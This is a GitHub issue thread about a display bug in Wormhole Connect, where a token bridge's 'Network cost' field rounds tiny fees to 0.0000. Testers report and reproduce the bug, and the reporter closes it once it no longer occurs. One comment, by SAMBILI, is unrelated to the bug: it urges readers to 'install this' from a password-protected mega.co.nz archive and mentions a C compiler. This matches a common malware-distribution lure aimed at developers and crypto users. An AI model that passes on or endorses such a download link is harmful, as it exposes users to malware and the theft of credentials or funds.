### ISSUE TITLE
[QA] "Network cost" value should have more decimals after comma

### ISSUE THREAD

**Issue by agodlevska** [wormhole-foundation/wormhole-connect#2676]
## Describe the current behavior in detail
Checked on https://portalbridge.com/ and https://wormhole-connect-mainnet.netlify.app/ with macOS Sonoma 14.6.1 and Google Chrome Version 129.0.6668.58 (Official Build) (x86_64).

Steps:

1. Prepare to send 0.000001 WBTC from Base (Coinbase) to Arbitrum (Coinbase)
2. Select "Automatic route" option
3. Check "Network cost" value
4. Click on "Review transaction" button
5. Check "Network cost" value

Actual result: "Network cost" value is shown as 0.0000 WBTC (~$0.03).
Expected result: "Network cost"" value have more decimals after comma or is shown as "~0 WBTC ($0.03)".

## Attachments/Notes
<img width="575" alt="Screenshot 2024-09-20 at 10 38 47" src="https://github.com/user-attachments/assets/fd48a7c2-5dae-449c-9195-d2ac0f5957d1">
<img width="553" alt="Screenshot 2024-09-20 at 10 39 01" src="https://github.com/user-attachments/assets/ce7f1a2d-c690-4ee9-9078-2971f5336214">

**Comment by SAMBILI** [comment]
install this
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A

Password: changeme

you may need to install the c compiler

**Comment by tsadovska** [comment]
Issue is also reproducible on Netlify with following [config](https://deploy-preview-2836--wormhole-connect-mainnet.netlify.app/?config=N4AgTg9grgLgpgZwFwgNoDpMBECiAxAQQFUAZAFQH0AlAeSLJwGUAaEAWQEMBPDgOyujwAuiAC%2BQA%3D%3D%3D) when sending 0.0001 ETH from Ethereum (MetaMask) to Optimism (MetaMask).


![Screenshot 2024-10-15 at 18 13 19](https://github.com/user-attachments/assets/1e4bc6f0-b944-4042-b687-338589b9ba15)

**Comment by agodlevska** [comment]
Issue is no longer reproducible on https://portalbridge.com/ and https://wormhole-connect-mainnet.netlify.app/.

Closing the ticket. 

Attachment:
<img width="587" alt="Screenshot 2024-11-14 at 16 29 15" src="https://github.com/user-attachments/assets/7cd6eeea-ba6b-4a0c-83d5-202f87bc04b7">
